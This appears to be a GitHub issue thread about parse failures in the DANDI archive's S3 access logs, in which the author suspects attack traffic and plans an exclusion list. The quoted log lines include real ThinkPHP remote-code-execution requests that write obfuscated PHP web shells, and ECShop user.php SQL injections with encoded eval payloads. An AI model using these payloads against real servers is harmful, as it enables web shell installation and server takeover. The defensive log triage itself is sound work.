[Line parsing errors]: 7/26/2024

[CodyCBakerPhD]

A list of line parsing errors found during full log parsing

[CodyCBakerPhD]

These look like some of those original problem ones mentioned by Roni, potentially some kind of attack on the archive from around that time?

[CodyCBakerPhD]

One thing I just noticed - despite these being GET requests, that / before the query indicates these have no target

So easily, we should just be able to early return against an unspecified asset blob

[CodyCBakerPhD]

Some of them do use /user.php as the target though, so perhaps start forming an exclusion list for these 'bad' targets?

[CodyCBakerPhD]

The last 3 items do actually seem like legit lines, no idea why they are so much longer than expected though...

[CodyCBakerPhD]

Line 7465090 of /mnt/backup/dandi/dandiarchive-logs/2023/01/06.log (parsed 29 items):

8787a3c41bf7ce0d54359d9348ad5b08e16bd5bb8ae5aa4e1508b435773a066e dandiarchive [06/Jan/2023:12:29:11 +0000] ???.???.???.??? - MJH1XJ8DHPSZFND7 REST.GET.OBJECT / "GET //?s=index/\think\template\driver\file/write&cacheFile=robots.php&content=xbshell1<?php$password%20=%20"xinba";$ch%20=%20explode(".","hello.ass.world.er.t");array_intersect_ukey(array($_REQUEST[$password]%20=>%201),%20array(1),%20$ch[1].$ch[3].$ch[4]);?> HTTP/1.1" 404 NoSuchKey 272 - 9 - "https://dandiarchive.s3.amazonaws.com//?s=index/\think\template\driver\file/write&cacheFile=robots.php&content=xbshell1<?php$password%20=%20"xinba";$ch%20=%20explode(".","hello.ass.world.er.t");array_intersect_ukey(array($_REQUEST[$password]%20=>%201),%20array(1),%20$ch[1].$ch[3].$ch[4]);?>" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" - V9t1ypjyDY4plW1QdEvZxgIn2dEET3gncqHpXCat9UyAups5FXGyiU0kcrI2fWZmTh66E67H/tI= - ECDHE-RSA-AES128-GCM-SHA256 - dandiarchive.s3.amazonaws.com TLSv1.2 - -

Line 7465091 of /mnt/backup/dandi/dandiarchive-logs/2023/01/06.log (parsed 29 items):

8787a3c41bf7ce0d54359d9348ad5b08e16bd5bb8ae5aa4e1508b435773a066e dandiarchive [06/Jan/2023:12:29:11 +0000] ???.???.???.??? - MJH3H3PKH9Z9D6PA REST.GET.OBJECT / "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=<?php%20$poc%20="axsxsxexrxt";$poc_1%20=%20explode("x",%20$poc);%20$poc_2%20=%20$poc_1[0]%20.%20$poc_1[1]%20.%20$poc_1[2]%20.%20$poc_1[3].%20$poc_1[4].%20$poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));?> HTTP/1.1" 404 NoSuchKey 272 - 6 - "https://dandiarchive.s3.amazonaws.com//?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=12345.php&vars[1][1]=<?php%20$poc%20="axsxsxexrxt";$poc_1%20=%20explode("x",%20$poc);%20$poc_2%20=%20$poc_1[0]%20.%20$poc_1[1]%20.%20$poc_1[2]%20.%20$poc_1[3].%20$poc_1[4].%20$poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['12345']))));?>" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" - pCf6sLR6ICzDfa+RoYY9VrqIy8+PvTo5wXI8Of14dU05gpx23amAPH0D97ZkEGUERB/R1eywl8I= - ECDHE-RSA-AES128-GCM-SHA256 - dandiarchive.s3.amazonaws.com TLSv1.2 - -

Line 7465097 of /mnt/backup/dandi/dandiarchive-logs/2023/01/06.log (parsed 31 items):

8787a3c41bf7ce0d54359d9348ad5b08e16bd5bb8ae5aa4e1508b435773a066e dandiarchive [06/Jan/2023:12:29:11 +0000] ???.???.???.??? - MJHFR6QSYZKVHX74 REST.GET.OBJECT /user.php "GET //user.php?act=login HTTP/1.1" 404 NoSuchKey 280 - 11 - "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:288:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -";s:2:"id";s:3:"'/*";}" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" - 0MfP9hPBK/cjYasCVnWUbcxuUTT0mLe+RBIFMfOncGl2kIulc20uAPgn57R7NntGmQF3ECgx/18= - ECDHE-RSA-AES128-GCM-SHA256 - dandiarchive.s3.amazonaws.com TLSv1.2 - -

Line 7465106 of /mnt/backup/dandi/dandiarchive-logs/2023/01/06.log (parsed 30 items):

8787a3c41bf7ce0d54359d9348ad5b08e16bd5bb8ae5aa4e1508b435773a066e dandiarchive [06/Jan/2023:12:29:20 +0000] ???.???.???.??? - 3X3CX6VTPS00Y2RR REST.GET.OBJECT /user.php "GET //user.php?act=login HTTP/1.1" 404 NoSuchKey 280 - 8 - "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:297:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A336C7A655846784C6E426F634363734A7A772F63476877494756325957776F4A46395154314E5557336C7A655630704F79412F506963702729293B2F2F7D787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" - R2/BoGjLaVZbis4u4mXGhGlWfig+HLVzglqO78SApIyxZryIvHmFBBsY+a21pY50cTHJgelSvhI= - ECDHE-RSA-AES128-GCM-SHA256 - dandiarchive.s3.amazonaws.com TLSv1.2 - -

Line 129479 of /mnt/backup/dandi/dandiarchive-logs/2023/06/26.log (parsed 37 items):

8787a3c41bf7ce0d54359d9348ad5b08e16bd5bb8ae5aa4e1508b435773a066e dandiarchive [26/Jun/2023:03:05:52 +0000] ???.???.???.??? - R31NYYY1MNCHGZ7C REST.GET.OBJECT blobs/231/012/2310125d-3596-445d-af64-583c7c236000 "GET /blobs/231/012/2310125d-3596-445d-af64-583c7c236000 HTTP/1.1" 200 - 13803712 938143890946 608 50 "-" ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" - m9ocmJgmUpsmoNaemUjpSSP1V1W4DkLtfCXmJ3Kci8qXqEFKc5yBRyh05FRAmte4U1uONY6H+Es= - ECDHE-RSA-AES128-GCM-SHA256 - dandiarchive.s3.amazonaws.com TLSv1.2 - -

Line 129480 of /mnt/backup/dandi/dandiarchive-logs/2023/06/26.log (parsed 37 items):

8787a3c41bf7ce0d54359d9348ad5b08e16bd5bb8ae5aa4e1508b435773a066e dandiarchive [26/Jun/2023:03:05:53 +0000] ???.???.???.??? - 5PCGX9WKFQMJH6FB REST.GET.OBJECT blobs/080/1d9/0801d996-200e-4173-ab49-d1784427e96a "GET /blobs/080/1d9/0801d996-200e-4173-ab49-d1784427e96a HTTP/1.1" 200 - 6616308 422868123111 205 35 "-" ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" - A54Zaz7Sl0ygUFZ4lEOYCXHxImvTGXnvR+rr9+JcM/gceQWDObRkwnP9nO+wK70lpMaaE78SWvA= - ECDHE-RSA-AES128-GCM-SHA256 - dandiarchive.s3.amazonaws.com TLSv1.2 - -

Line 129508 of /mnt/backup/dandi/dandiarchive-logs/2023/06/26.log (parsed 37 items):

8787a3c41bf7ce0d54359d9348ad5b08e16bd5bb8ae5aa4e1508b435773a066e dandiarchive [26/Jun/2023:03:05:52 +0000] ???.???.???.??? - R31GFNRPCDN259VV REST.GET.OBJECT blobs/fae/b55/faeb55de-5809-4a40-a2fe-bd32edad90e4 "GET /blobs/fae/b55/faeb55de-5809-4a40-a2fe-bd32edad90e4 HTTP/1.1" 200 - 25024056 393912179529 1015 70 "-" ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" - LPUZltF7LVqXVSTqIMLPb/QZ/QDV0DuHmX7s3LuXT/ZmKIi9b4SmEDHlQYVYmCKPGM6JOkFMV28= - ECDHE-RSA-AES128-GCM-SHA256 - dandiarchive.s3.amazonaws.com TLSv1.2 - -